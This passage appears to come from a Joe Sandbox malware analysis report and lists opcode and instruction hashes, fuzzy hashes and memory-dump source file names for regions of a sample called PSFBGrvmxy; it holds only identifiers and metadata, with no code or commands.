                                                                                        • Opcode Fuzzy Hash: 4464df1ff38c719dbefb3dd528741fb9eda8353db4756a8deda258d47de45e3e
                                                                                        • Instruction Fuzzy Hash: A0213A75510248DFDB01CF98E9C4B16FF65FB88328F24857DEA050B206C33AD845CBA2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.618469664.000000000130D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0130D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_130d000_PSFBGrvmxy.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: be3b8f860a55018ac91fda283f9827f76ccff3e5166ac96b9cc159cbc30c6a5b
                                                                                        • Instruction ID: b215986223bf7a7cb046878fc87c8d5570d9201d2a08d2c7439396ef6c161130
                                                                                        • Opcode Fuzzy Hash: be3b8f860a55018ac91fda283f9827f76ccff3e5166ac96b9cc159cbc30c6a5b
                                                                                        • Instruction Fuzzy Hash: EF2125B1504244DFDB12DF98D9D0B26BBE5FB84318F24C56DE84D0B686C33AD846CA61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.618469664.000000000130D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0130D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_130d000_PSFBGrvmxy.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1456592e56a1f39163a3414e476ffb9615ad64ecd9359f7570bd5bd80a0f428a
                                                                                        • Instruction ID: a8b9b0dfc07a55d6f615a9a2ee6aabfb4d9dc24ed4ade5c1798ab108a1ceca92
                                                                                        • Opcode Fuzzy Hash: 1456592e56a1f39163a3414e476ffb9615ad64ecd9359f7570bd5bd80a0f428a
                                                                                        • Instruction Fuzzy Hash: DA21F571504244DFDB4ADF98C9D0B16BFE5FB84318F20C56DE90A4B682CB3AD846C661
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.618253914.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_12fd000_PSFBGrvmxy.jbxd